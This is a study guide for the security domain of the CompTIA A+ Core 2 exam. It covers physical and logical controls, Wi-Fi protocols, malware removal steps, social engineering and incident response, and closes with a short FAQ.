CompTIA A+ Security Study Guide

Fortifying Your Knowledge for CompTIA A+ Exam Core 2 (220-1102 Domain 2.0)

Welcome to your essential guide for Domain 2.0: Security, a critical component of the CompTIA A+ Core 2 (220-1102) exam. In an increasingly digital world, security is paramount. As an IT professional, you'll be responsible for safeguarding systems, data, and user privacy against a multitude of threats.

This guide delves into the core principles of security, covering physical and logical controls, wireless network security, malware protection and removal, understanding social engineering tactics, and fundamental incident response procedures. Mastering these concepts will empower you to implement robust security measures and protect valuable assets.

Domain 2.0 Quick Navigation:

2.1 Physical Security Measures: The First Line of Defense

Physical security prevents unauthorized physical access to equipment, facilities, and resources. If an attacker can physically touch your hardware, logical security can often be bypassed.

Key Physical Controls

  • Locks: Standard door locks, deadbolts, server cabinet locks, cable locks for laptops and desktops.
  • Badges & Entry Control: ID badges, smart cards, key fobs for access control systems. Mantrap/access control vestibules.
  • Biometrics: Fingerprint scanners, retinal scanners, facial recognition for authentication.
  • Security Cameras (CCTV): Surveillance to monitor and record activity, acting as a deterrent and for forensic analysis.
  • Alarm Systems: Detect unauthorized entry and alert security personnel or authorities.
  • Server Rooms/Cages: Secure, dedicated areas with restricted access for critical infrastructure.
  • Signage & Guards: Visible warnings and security personnel can deter unauthorized access.
  • Asset Tracking Tags: RFID or barcode tags to monitor the location of valuable equipment.

2.2 Logical Security Controls: Protecting Data and Systems

Logical security uses software and data-based solutions to protect systems and information from unauthorized access, modification, or disclosure.

Authentication & Authorization:

  • Passwords: Enforce complexity (length, character types), history, and expiration policies. Avoid default credentials.
  • Multi-Factor Authentication (MFA): Requires two or more verification factors:
    • Something you know (password, PIN)
    • Something you have (token, smart card, phone app)
    • Something you are (biometrics)
  • Access Control Lists (ACLs): Define which users or groups have access to specific resources and what actions they can perform.
  • Principle of Least Privilege: Grant users only the necessary permissions to perform their job duties.
  • Account Management: Disable or remove accounts for terminated employees promptly. Regular account reviews.

Data Protection & System Security:

  • Encryption:
    • Full Disk Encryption (FDE): e.g., BitLocker (Windows), FileVault (macOS).
    • File/Folder Encryption: e.g., EFS (Windows), VeraCrypt.
    • Email Encryption: S/MIME, PGP.
  • Software Firewalls: Host-based firewalls (e.g., Windows Defender Firewall) control inbound/outbound network traffic for an individual system.
  • Directory Permissions: NTFS permissions (Windows), Unix-style permissions (Linux/macOS) to control file/folder access.
  • Disabling Unused Ports/Services: Reduce attack surface by turning off unnecessary network ports and system services.
  • Screen Savers & Auto-Lock: Password-protected screen savers and automatic system lock after inactivity.

2.3 Wireless Security Protocols: Securing Wi-Fi Networks

Wireless networks are convenient but introduce unique security risks. Proper configuration is essential to prevent unauthorized access and data interception.

Encryption Standards:

  • WEP (Wired Equivalent Privacy): Deprecated and insecure. Do not use.
  • WPA (Wi-Fi Protected Access): Interim standard, also vulnerable. Use WPA2 or WPA3.
  • WPA2 (Wi-Fi Protected Access 2): Uses AES-CCMP encryption. Strong, but vulnerable to KRACK attacks if unpatched. Still widely used.
  • WPA3 (Wi-Fi Protected Access 3): Latest standard. Offers stronger encryption (GCMP-256), Simultaneous Authentication of Equals (SAE) to prevent offline dictionary attacks, and improved security for open networks (Wi-Fi Enhanced Open™).

Authentication Methods:

  • PSK (Pre-Shared Key) / Personal Mode: Uses a shared passphrase. Suitable for home/SOHO.
  • Enterprise Mode (802.1X): Uses a RADIUS server for individual user authentication. More secure for businesses. Requires a certificate infrastructure.

Other Security Measures:

  • Change Default SSID & Admin Credentials: Don't use factory defaults for the network name or router login.
  • Disable SSID Broadcast (Concealment): Hides the network name from casual scans. Minor security benefit, easily bypassed by attackers.
  • MAC Filtering: Allows only specified MAC addresses to connect. Can be spoofed, so not a primary security measure.
  • Antenna Placement & Power Levels: Configure to cover only the intended area to reduce signal leakage.
  • Firmware Updates: Keep router/AP firmware up-to-date to patch vulnerabilities.
  • Guest Networks: Isolate guest traffic from the internal network.

2.4 Malware Protection & Removal: Combating Malicious Software

Malware (viruses, worms, trojans, ransomware, spyware, adware) poses a significant threat. Effective protection involves prevention, detection, and remediation.

Types of Malware & Protection Tools

Common Malware Types:

  • Viruses: Attach to legitimate programs, require human action to spread.
  • Worms: Self-replicating, spread across networks without human intervention.
  • Trojans: Disguise as legitimate software but contain malicious payloads.
  • Ransomware: Encrypts files and demands payment for decryption.
  • Spyware/Adware: Collects user information or displays unwanted ads.
  • Rootkits: Gain privileged access and hide their presence.
  • Keyloggers: Record keystrokes to steal credentials.
  • Bots/Botnets: Compromised computers controlled by an attacker.

Protection Software:

  • Antivirus (AV): Detects and removes known viruses using signature-based and heuristic detection.
  • Anti-malware: Broader scope, targets various malware types beyond just viruses.
  • Endpoint Detection and Response (EDR): Advanced threat detection, investigation, and response capabilities. Monitors endpoint activity.
  • Pop-up Blockers: Prevent annoying and potentially malicious pop-up windows.

Malware Removal Best Practices (CompTIA Steps)

  1. 1. Identify and research malware symptoms.
  2. 2. Quarantine the infected system(s). (Disconnect from network).
  3. 3. Disable System Restore (in Windows). (Prevents reinfection from restore points).
  4. 4. Remediate the infected systems:
    • Update anti-malware software.
    • Scan and remove malware (may require Safe Mode or bootable media).
  5. 5. Schedule scans and run updates.
  6. 6. Enable System Restore and create a restore point (in Windows).
  7. 7. Educate the end user. (Prevention is key).

2.5 Social Engineering & Common Threats: Exploiting Human Psychology

Social engineering manipulates people into divulging confidential information or performing actions. Awareness and training are crucial defenses.

Social Engineering Techniques:

  • Phishing: Broad email campaigns to trick users into revealing info or clicking malicious links.
  • Spear Phishing: Targeted phishing attacks, often personalized.
  • Whaling: Spear phishing targeting high-profile individuals (CEOs, CFOs).
  • Vishing (Voice Phishing): Phishing over the phone.
  • Smishing (SMS Phishing): Phishing via text messages.
  • Tailgating/Piggybacking: Following an authorized person into a restricted area.
  • Impersonation: Pretending to be someone else (e.g., IT support, vendor).
  • Dumpster Diving: Sifting through trash for sensitive information.
  • Shoulder Surfing: Observing someone entering credentials or sensitive data.
  • Hoaxes: False information designed to cause panic or trick users.
  • Watering Hole Attack: Compromising a website frequented by specific targets.

Other Common Threats:

  • Denial of Service (DoS) / Distributed DoS (DDoS): Overwhelming a system with traffic to make it unavailable.
  • Zero-Day Attack: Exploits a vulnerability before a patch is available.
  • Man-in-the-Middle (MitM): Intercepting communication between two parties.
  • Brute Force / Dictionary Attacks: Systematically trying passwords.
  • Insider Threats: Malicious actions by current or former employees.

Prevention:

  • User education and awareness training.
  • Verify requests through separate channels.
  • Implement strong password policies and MFA.
  • Secure document disposal (shredding).

2.6 Incident Response & Data Security: Handling Breaches and Protecting Data

Effective incident response minimizes damage from security breaches. Data security encompasses backup, recovery, and secure disposal.

Incident Response (First Responder):

  • 1. Identify the incident: Recognize that a security event has occurred.
  • 2. Report through proper channels: Notify management, security team, or help desk as per policy.
  • 3. Collect and protect information: Preserve evidence, document observations, don't alter the system unnecessarily. Chain of custody.
  • 4. Containment: Isolate affected systems to prevent spread (e.g., disconnect from network).
  • 5. Eradication & Recovery: Remove the threat and restore systems to normal operation.
  • 6. Lessons Learned: Post-incident review to improve future responses.

Data Security & Disposal:

  • Data Backup:
    • Types: Full, Incremental, Differential.
    • Strategy: 3-2-1 rule (3 copies, 2 different media, 1 offsite). Regular testing.
  • Data Recovery: Procedures to restore data from backups.
  • Secure Data Destruction:
    • Overwriting/Wiping: Using software to write random data over the drive.
    • Degaussing: Using strong magnets to erase magnetic media (HDDs, tapes).
    • Physical Destruction: Shredding, pulverizing, drilling.
  • Data Sensitivity & Compliance:
    • PII (Personally Identifiable Information)
    • PHI (Protected Health Information - HIPAA)
    • PCI DSS (Payment Card Industry Data Security Standard)
    • GDPR (General Data Protection Regulation)

CompTIA A+ Security FAQ

What is the primary purpose of Multi-Factor Authentication (MFA)?
The primary purpose of MFA is to add an extra layer of security beyond just a username and password. By requiring two or more different types of verification factors (something you know, have, or are), MFA makes it significantly harder for unauthorized users to gain access even if one factor (like a password) is compromised.
As a first responder to a security incident, what is one of the most important initial steps?
One of the most important initial steps is to identify that an incident has occurred and then report it through the proper channels according to your organization's policy. Proper reporting ensures that the incident is handled correctly and that the appropriate teams are involved. Before extensive action, documentation and evidence preservation (if applicable) are also crucial.
Which method of secure data destruction is suitable for solid-state drives (SSDs)?
For SSDs, degaussing is generally ineffective. Physical destruction (shredding, pulverizing) is the most reliable method. Some SSDs also support secure erase commands (ATA Secure Erase) built into their firmware, which can be effective, but physical destruction provides the highest assurance for highly sensitive data. Overwriting multiple times is less effective on SSDs due to wear-leveling algorithms.

Building a Strong Security Foundation

The security landscape is constantly evolving, but the principles covered in CompTIA A+ Core 2 Domain 2.0 provide a vital foundation for any IT professional. From implementing physical safeguards and configuring logical controls to recognizing social engineering tactics and responding to incidents, these skills are indispensable for protecting digital assets.

Continuously update your security knowledge, stay informed about new threats and countermeasures, and always practice security-conscious behavior. Your diligence will be key to maintaining the integrity, confidentiality, and availability of systems and data. Best of luck as you pursue your A+ certification and beyond!